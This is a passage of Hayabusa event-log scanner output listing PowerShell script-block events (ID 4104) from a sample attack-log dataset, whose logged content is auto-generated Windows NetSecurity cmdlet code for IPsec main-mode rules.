'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } 
} catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 